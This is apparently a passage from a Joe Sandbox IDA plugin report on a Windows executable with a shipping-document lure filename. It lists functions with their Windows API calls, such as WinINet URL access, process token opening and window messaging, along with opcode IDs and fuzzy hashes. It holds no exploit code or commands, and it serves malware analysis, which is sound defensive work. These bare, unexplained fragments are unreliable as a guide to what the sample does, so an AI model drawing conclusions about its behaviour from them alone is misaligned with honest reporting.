                    • Instruction Fuzzy Hash: C9219C31E40108EFCB10DFA4CA45BFEB7B8EF40306F144859E858B7241DB30AA09CB51
                    APIs
                    • __setmode.LIBCMT ref: 00E20B2E
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E6793F,?,?,00000000), ref: 00E05B8C
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E6793F,?,?,00000000,?,?), ref: 00E05BB0
                    • _fprintf.LIBCMT ref: 00E20B65
                    • OutputDebugStringW.KERNEL32(?), ref: 00E56111
                      • Part of subcall function 00E24C1A: _flsall.LIBCMT ref: 00E24C33
                    • __setmode.LIBCMT ref: 00E20B9A
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 5c61d11667aecbf09900641156544909db344b906e631296ea4b0646d4d79255
                    • Instruction ID: 738b5e8a24d67a21c120f16d2f0ff08699f081406dfa895d2b4f527a4909886f
                    • Opcode Fuzzy Hash: 5c61d11667aecbf09900641156544909db344b906e631296ea4b0646d4d79255
                    • Instruction Fuzzy Hash: 231136729042287EDB18B7B4BC43DBE7BE99F45320F14216AF108B71D3EE215C8647A5
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E718B9
                      • Part of subcall function 00E71943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E71962
                      • Part of subcall function 00E71943: InternetCloseHandle.WININET(00000000), ref: 00E719FF
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
                    • Instruction ID: e5ef145d514e2d530da9c7548513bb32955ca3d30eab3785c0b46f6c41132c28
                    • Opcode Fuzzy Hash: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
                    • Instruction Fuzzy Hash: D621D171200705BFEB159F68CC10FBAB7ADFF88700F00902AFA59B6650DB31D9129791
                    APIs
                    • GetFileAttributesW.KERNEL32(?,00E8FAC0), ref: 00E63AA8
                    • GetLastError.KERNEL32 ref: 00E63AB7
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E63AC6
                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E8FAC0), ref: 00E63B23
                    Similarity
                    • API ID: CreateDirectory$AttributesErrorFileLast
                    • String ID:
                    • API String ID: 2267087916-0
                    • Opcode ID: 59f5add5f45b313d1bbbec0359de91f1c9316942fe22c13c09c5129d49fb8d2e
                    • Instruction ID: 99483153295dfc8e441af1e7f092c7c3884aa1ac3ee38a0503375bded236d60d
                    • Opcode Fuzzy Hash: 59f5add5f45b313d1bbbec0359de91f1c9316942fe22c13c09c5129d49fb8d2e
                    • Instruction Fuzzy Hash: 9C2182305482019FC710DF34D88089BB7E4EF557A8F145A5AF49DE72A2D7309E49CB92
                    APIs
                    • _free.LIBCMT ref: 00E35281
                      • Part of subcall function 00E2588C: __FF_MSGBANNER.LIBCMT ref: 00E258A3
                      • Part of subcall function 00E2588C: __NMSG_WRITE.LIBCMT ref: 00E258AA
                      • Part of subcall function 00E2588C: RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00E20F53,?), ref: 00E258CF
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 0e11318f3e147728161f671ae2565e7390c56262efcc6a3c54b7b58d602d7bb5
                    • Instruction ID: e69b4b07b2342886778ec63690d151447f1c8a7ac704b59f7fb19e1971148d7c
                    • Opcode Fuzzy Hash: 0e11318f3e147728161f671ae2565e7390c56262efcc6a3c54b7b58d602d7bb5
                    • Instruction Fuzzy Hash: F011C133506A25AFCB212FB0BD0966B3BE8AB11364F206539F919BA260DF348940C791
                    APIs
                    • _memset.LIBCMT ref: 00E04560
                      • Part of subcall function 00E0410D: _memset.LIBCMT ref: 00E0418D
                      • Part of subcall function 00E0410D: _wcscpy.LIBCMT ref: 00E041E1
                      • Part of subcall function 00E0410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E041F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00E045B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E045C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E3D5FE
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: 8955ce8d56c4528fa3c87f842843c6fb88a37e90b54c3f6dcc9db23ef4912231
                    • Instruction ID: 8667e77ab3ac1a3e6d3d1d0aabf11f1eb920bfb0bb8e09deabea62b0c90e5b70
                    • Opcode Fuzzy Hash: 8955ce8d56c4528fa3c87f842843c6fb88a37e90b54c3f6dcc9db23ef4912231
                    • Instruction Fuzzy Hash: 1021A4B1508784AFE7328B649C59BE6BFEC9B01308F04109EE699B6181D7751988CB51
                    APIs
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E6793F,?,?,00000000), ref: 00E05B8C
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E6793F,?,?,00000000,?,?), ref: 00E05BB0
                    • gethostbyname.WSOCK32(?,?,?), ref: 00E764AF
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E764BA
                    • _memmove.LIBCMT ref: 00E764E7
                    • inet_ntoa.WSOCK32(?), ref: 00E764F2
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 18ba726244d960a364005d457f14f68262ada795864906ba993dcf06e30e3834
                    • Instruction ID: 05281ecd053cb0886be372229f5198e8d39eda967e0f6f915270defc324bd215
                    • Opcode Fuzzy Hash: 18ba726244d960a364005d457f14f68262ada795864906ba993dcf06e30e3834
                    • Instruction Fuzzy Hash: F3114C32900109AFCB04EBA4DD86DAEB7F8AF58310B149065F50AB71A2DB30AE54CB61
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E58E23
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58E35
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58E4B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58E66
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
                    • Instruction ID: fc31c7a599048e38fe1fc5fda7ae8cc16c6e273213cb9ad3e2a83d5d848bbd4b
                    • Opcode Fuzzy Hash: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
                    • Instruction Fuzzy Hash: F6115A79900218FFEB10DFA5CD85E9DBBB8FB08710F204095E904B7290DA716E14DB90
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                    • GetClientRect.USER32(?,?), ref: 00E3B77B
                    • GetCursorPos.USER32(?), ref: 00E3B785
                    • ScreenToClient.USER32(?,?), ref: 00E3B790
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: 27621b47873811e54f83eee6cd4113871cc0cf1f6dad48763e55ddc040bb8601
                    • Instruction ID: 11fe529fbf7f536ec88f61234ce2c24e17d9aab10d0703c5ec1601ecea5f095e
                    • Opcode Fuzzy Hash: 27621b47873811e54f83eee6cd4113871cc0cf1f6dad48763e55ddc040bb8601
                    • Instruction Fuzzy Hash: E0113D35500019EFCB10DF94D8899FE77F8EB05300F4015A6F905FB2A0D730BA95ABA5
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E61490
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E614B5
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E614BF
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E614F2
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: ac75bf695163b3aab827627197e8297f9fdd6f55278e5ab0bcf223bd9db55b82
                    • Instruction ID: 6fb97438ac163b1f5662e27a92a9388b37644a1c18d805b768483bbbd155a3ad
                    • Opcode Fuzzy Hash: ac75bf695163b3aab827627197e8297f9fdd6f55278e5ab0bcf223bd9db55b82
                    • Instruction Fuzzy Hash: EF119731C41569DBCF00AFA6E988AEEBB78FF08752F085196E954B3241CF3095608BA1
                    APIs
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: f6e154d70688f0cd606853472772f801065ffe3d0982e1270144850e2b32dfb1
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 2E0169B204914ABBCF225E84CC098EE3F66BB18344F099415FE9869121C336C9B1FB81
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00E8B318
                    • ScreenToClient.USER32(?,?), ref: 00E8B330
                    • ScreenToClient.USER32(?,?), ref: 00E8B354
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8B36F
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
                    • Instruction ID: 1ddcda430bd68867a13db19a40e3895639ba0aaf04e6a391aad65946618939f0
                    • Opcode Fuzzy Hash: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
                    • Instruction Fuzzy Hash: 85114675D00209EFDB41DF99C4449EEBBB5FF08310F104166E915E3220D775AA559F91
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 00E66C8F
                      • Part of subcall function 00E6776D: _memset.LIBCMT ref: 00E677A2
                    • _memmove.LIBCMT ref: 00E66CB2
                    • _memset.LIBCMT ref: 00E66CBF
                    • LeaveCriticalSection.KERNEL32(?), ref: 00E66CCF
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 59644fff6fc7ffe77510eb253b438a181f343fad39c0cbf3a5210778f16e56ab
                    • Instruction ID: b1b17fa6dd0ec2dbacf321939619e23a2ce556ca8eb0c1c2e8d842946fb7d41d
                    • Opcode Fuzzy Hash: 59644fff6fc7ffe77510eb253b438a181f343fad39c0cbf3a5210778f16e56ab
                    • Instruction Fuzzy Hash: D4F05E3A204114ABCF016F55ED85E8ABB6AEF45360F148065FE08BE22BC735E811CBB4
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E5A179
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5A18C
                    • GetCurrentThreadId.KERNEL32 ref: 00E5A193
                    • AttachThreadInput.USER32(00000000), ref: 00E5A19A
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: 23ab8f83f2f1f7cca3883a82c53f2c8df14ff17f009b06328dcc57790d3b37a6
                    • Instruction ID: a1c43f4d034ce4bc543355b36068ba42b2592f64fcf3564c31ca038b0eaf5a44
                    • Opcode Fuzzy Hash: 23ab8f83f2f1f7cca3883a82c53f2c8df14ff17f009b06328dcc57790d3b37a6
                    • Instruction Fuzzy Hash: 71E039B1542228BADB201FA2DD0CED73F1CEF267A2F048234F90DA4060D675C558DBE0
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00E02231
                    • SetTextColor.GDI32(?,000000FF), ref: 00E0223B
                    • SetBkMode.GDI32(?,00000001), ref: 00E02250
                    • GetStockObject.GDI32(00000005), ref: 00E02258
                    • GetWindowDC.USER32(?,00000000), ref: 00E3C003
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E3C010
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00E3C029
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00E3C042
                    • GetPixel.GDI32(00000000,?,?), ref: 00E3C062
                    • ReleaseDC.USER32(?,00000000), ref: 00E3C06D
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 3698e548f17046d1e7889bcd012a28546eee00f4fe6fa97fc18d8f11ff924215
                    • Instruction ID: dcfd6a436f915e7c402a90438fdf1e349766f960a0e9ca3e07e32432876d64ae
                    • Opcode Fuzzy Hash: 3698e548f17046d1e7889bcd012a28546eee00f4fe6fa97fc18d8f11ff924215
                    • Instruction Fuzzy Hash: B0E03932200244EEEB216FA5EC0D7D83B10EB05336F108366FA6D680E287714994DB11
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00E58A43
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E5860E), ref: 00E58A4A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E5860E), ref: 00E58A57
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E5860E), ref: 00E58A5E
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                    • Instruction ID: 337d9a5408b4fd23b95e7335afb7d350ff17cf92718f676ee60464c508416240
                    • Opcode Fuzzy Hash: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                    • Instruction Fuzzy Hash: E5E04F36A012119FD7605FB26D0CB563BA8AF54796F244828E649F9055DA2494498750
                    APIs
                    • GetDesktopWindow.USER32 ref: 00E420B6
                    • GetDC.USER32(00000000), ref: 00E420C0
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E420E0
                    • ReleaseDC.USER32(?), ref: 00E42101
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: f0c3578fb8ec2a98c14c995ddbb0d8f25a383bf7627cdb881c7614074460fb0f
                    • Instruction ID: dfc18b514c4c66c611237218244ed0d58a2976cd9d03688a033e516dd9024b69
                    • Opcode Fuzzy Hash: f0c3578fb8ec2a98c14c995ddbb0d8f25a383bf7627cdb881c7614074460fb0f
                    • Instruction Fuzzy Hash: A2E0E575800204EFCB01AF61D80869D7BF1EF5C310F208229F95AB7261DB388195AF80
                    APIs
                    • GetDesktopWindow.USER32 ref: 00E420CA
                    • GetDC.USER32(00000000), ref: 00E420D4
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E420E0
                    • ReleaseDC.USER32(?), ref: 00E42101
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: a3fb36e3c45f9e7bb5c0f48bf6de18527901f3b3189c15b96a7bd3232a62a77a
                    • Instruction ID: 8c4f331f4e36ce1d2622bf209154b0c5a85c78770e382e98345e0c52d17137c0
                    • Opcode Fuzzy Hash: a3fb36e3c45f9e7bb5c0f48bf6de18527901f3b3189c15b96a7bd3232a62a77a
                    • Instruction Fuzzy Hash: 2CE01A75800204AFCF019F71C80869D7BF1EF5C310F108225F95EB7261DB389195AF80
                    Strings
                    Similarity
                    • API ID:
                    • String ID: %
                    • API String ID: 0-2291192146
                    • Opcode ID: 6109939ac2fd63977b264851af81f2d684bc8271582f07dee7d8c47c960f4935
                    • Instruction ID: 8b6994a51e39e224cfde73d229e41ff5e18d4157cacf5fd27bd7ce568e2a66b0
                    • Opcode Fuzzy Hash: 6109939ac2fd63977b264851af81f2d684bc8271582f07dee7d8c47c960f4935
                    • Instruction Fuzzy Hash: D9B1AF71D0010A9ACF24EF94C881AEEBBB4FF44310F506426E952B72D5DB319EE6CB61
                    APIs
                    Strings
                    Similarity
                    • API ID: __itow_s
                    • String ID: xb$xb
                    • API String ID: 3653519197-3775679291
                    • Opcode ID: 7c2a8a0e7b7449856b65219f8cc1d9e46f9d943314c31db7ca3ef128374f407e
                    • Instruction ID: 18aa5216305934a60b5670eada1da39ed2323f076e46b1b6235f7888f1eee38e
                    • Opcode Fuzzy Hash: 7c2a8a0e7b7449856b65219f8cc1d9e46f9d943314c31db7ca3ef128374f407e
                    • Instruction Fuzzy Hash: 69B14C70A00209EFDB14DF54C891EAAB7F9FF58304F14D459F949AB292EB71E981CB60
                    APIs
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • __wcsnicmp.LIBCMT ref: 00E6B0B9
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E6B182
                    Strings
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: 88bd3c4ee3d7da37fbb75ec59dfc7a398c52c9c5dc0606f60cb13cdbd7cc9501
                    • Instruction ID: 0bd8bb3246261e04c55a21b723cfe9443f4ca28379743d5cc3d1c620b59c91e3
                    • Opcode Fuzzy Hash: 88bd3c4ee3d7da37fbb75ec59dfc7a398c52c9c5dc0606f60cb13cdbd7cc9501
                    • Instruction Fuzzy Hash: 82618F75A40215AFCB14DF98D891EAEB7F4AF49350F105069F956FB292DB30AE80CB90
                    APIs
                    Strings
                    Similarity
                    • API ID: _memmove
                    • String ID: Oa
                    • API String ID: 4104443479-3945284152
                    • Opcode ID: 3638781d95057cbcc67d42282debc7e31162377a1939ad3edc6f1cc6c34bb9e8
                    • Instruction ID: 0d14909ead379bc8ca109c29cf32060fdd91046fe29436ec4b031a219d7eb5b5
                    • Opcode Fuzzy Hash: 3638781d95057cbcc67d42282debc7e31162377a1939ad3edc6f1cc6c34bb9e8
                    • Instruction Fuzzy Hash: B1515FB0A00609DFDB64CF68D580AEEB7F1FF45308F14951AE85AE7240EB31A995CB51
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00E12AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E12AE1
                    Strings
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: e54670f3471d2c544a446b3417215c974fe673c76c947be4f9b1720fae14e4c0
                    • Instruction ID: 787901321146cfdead55ea54a52d8d9c6f6f8b7cd0f25be81e97cf8480fbf650
                    • Opcode Fuzzy Hash: e54670f3471d2c544a446b3417215c974fe673c76c947be4f9b1720fae14e4c0
                    • Instruction Fuzzy Hash: 975167B15187449BD320AF14DC86BAFBBF8FB84310F41884CF2D9610A2DB709968CB66
                    APIs
                      • Part of subcall function 00E0506B: __fread_nolock.LIBCMT ref: 00E05089
                    • _wcscmp.LIBCMT ref: 00E698CD
                    • _wcscmp.LIBCMT ref: 00E698E0
                    Strings
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: a2a98b4d195eeb9898e0e00b4f517ece1fdc65cc8e8cf4c94cb3225d9b5d57a4
                    • Instruction ID: 94f5acfc26bf0e60916c1c69284002a4be9bfc090c8638967b77779b617181a3
                    • Opcode Fuzzy Hash: a2a98b4d195eeb9898e0e00b4f517ece1fdc65cc8e8cf4c94cb3225d9b5d57a4
                    • Instruction Fuzzy Hash: 57410572A4061ABADF209BA0DC85FEFB7FDDF45750F00146AB900F7181DA71AD458BA1
                    APIs
                    Strings
                    Similarity
                    • API ID: ClearVariant
                    • String ID: Dd$Dd
                    • API String ID: 1473721057-2413357308
                    • Opcode ID: 214d1fc77a0546f705b4932c95e2e732420962671171ef134f3cd66b16e0a054
                    • Instruction ID: f38721776144f81c2faeb301994bf096b7e630fef97b178a69e87c42c6d6a323
                    • Opcode Fuzzy Hash: 214d1fc77a0546f705b4932c95e2e732420962671171ef134f3cd66b16e0a054
                    • Instruction Fuzzy Hash: 84511975604345CFD754CF19C480A1ABBF1BF99344F58A82CE995AB3A1D331EC85CB42
                    APIs
                    • _memset.LIBCMT ref: 00E726B4
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E726EA
                    Strings
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: c7601543d087e24e2d9a0db066a35f694dd4fbb0f4c5e30265d6304759276a7e
                    • Instruction ID: c4aa7870e0feec709a5dcf7305cddd37f6de104f7e23e2c732b896a561640a89
                    • Opcode Fuzzy Hash: c7601543d087e24e2d9a0db066a35f694dd4fbb0f4c5e30265d6304759276a7e
                    • Instruction Fuzzy Hash: AC314671900119AFDF05EFA4CC85EEEBFB8FF08310F00506AF908B6166DA315A46CB60
                    APIs
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E87B93
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E87BA8
                    Strings
                    Similarity
                    • API ID: MessageSend
                    • String ID: '
                    • API String ID: 3850602802-1997036262
                    • Opcode ID: cedb9d2220fa7a455dfd7885f740007f99734e7b9b7c4a23865b4b0ffd02855a
                    • Instruction ID: 36ae0ac10734061945297fb5b4767b03d88516870c73f7b90d10da9a8afebdd9
                    • Opcode Fuzzy Hash: cedb9d2220fa7a455dfd7885f740007f99734e7b9b7c4a23865b4b0ffd02855a
                    • Instruction Fuzzy Hash: AC411675A042099FDB14DF69C881BDABBF6FB08300F20116AE948AB391D731E941CFA0
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00E86B49
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E86B85
                    Strings
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 7b51ccbbc789585db6cd2e452bc181e7c9f0a01294cf0436162cd40bbf6c2345
                    • Instruction ID: d33b236f8fd6d1a989fc7dd4ec281d9f47c1baa9e9cd52cb8500a1df0888ccb9
                    • Opcode Fuzzy Hash: 7b51ccbbc789585db6cd2e452bc181e7c9f0a01294cf0436162cd40bbf6c2345
                    • Instruction Fuzzy Hash: 36317071110604AEEB14AF64CC81AFB73A9FF88728F10A619F99DE7190DB31AC81D760
                    APIs
                    • _memset.LIBCMT ref: 00E62C09
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E62C44
                    Strings
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: c70a63ec4fd094276263a5c5cdd2b5ed8b6fc44721d795d39ecb6a77439158b7
                    • Instruction ID: 3fadf790e4537b159c085360f11eb62b3c2d639f29ce11fdc916814e2cdaef39
                    • Opcode Fuzzy Hash: c70a63ec4fd094276263a5c5cdd2b5ed8b6fc44721d795d39ecb6a77439158b7
                    • Instruction Fuzzy Hash: 9A31F531A406099FEB348F58E985BAEFBF8FF04394F14502DEE85B61A1D7709A44CB10
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E86793
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E8679E
                    Strings
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 4fb5e95ede313b9af0d594c848f1c9b1d15f16d4cd083b6ce726a22ab34272ce
                    • Instruction ID: bcf4e7e0c21aec373b3a7303f3c4f59059effa0d1f0fb746b57b4b9e7c369429
                    • Opcode Fuzzy Hash: 4fb5e95ede313b9af0d594c848f1c9b1d15f16d4cd083b6ce726a22ab34272ce
                    • Instruction Fuzzy Hash: 8E1186752002086FEF11AF14DD81EFB376AEB44368F105126F91CA7290E6329C5197A0
                    APIs
                      • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                      • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                      • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                    • GetWindowRect.USER32(00000000,?), ref: 00E86CA3
                    • GetSysColor.USER32(00000012), ref: 00E86CBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: b0e51b2e1f8b40d330ae8e862aa08c8f4a54c1b62225a30c15d8071be83ff36a
                    • Instruction ID: e1e7baf99bf79482d944b19ca165495781e381142d51623a37c729415685766e
                    • Opcode Fuzzy Hash: b0e51b2e1f8b40d330ae8e862aa08c8f4a54c1b62225a30c15d8071be83ff36a
                    • Instruction Fuzzy Hash: 43215972610209AFDB04EFA8DC45AFABBA8EB08304F005629F959E2250E735E860DB50
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00E869D4
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E869E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: a74a670328d7320feb47656deb4a3e0b9c4a60aac297c50a0975a7ff44b8f850
                    • Instruction ID: d58cbcf3c3c06dea34a704817aa7619c77e2bd09b6ff5d647d901d55e7f2c32c
                    • Opcode Fuzzy Hash: a74a670328d7320feb47656deb4a3e0b9c4a60aac297c50a0975a7ff44b8f850
                    • Instruction Fuzzy Hash: 8A116D71500204AFEB116F64DC40AEB37A9EB85378F606724F9ACB71D0C631DC919760
                    APIs
                    • _memset.LIBCMT ref: 00E62D1A
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E62D39
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
                    • Instruction ID: 456c6f35f352430b135a654960055f2240d51e8b218e330a303cb782bd537180
                    • Opcode Fuzzy Hash: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
                    • Instruction Fuzzy Hash: E4110832E41914EFDB21DB58EC44FADB7B9AB05384F142139EE15BB2A0D731AD05C792
                    APIs
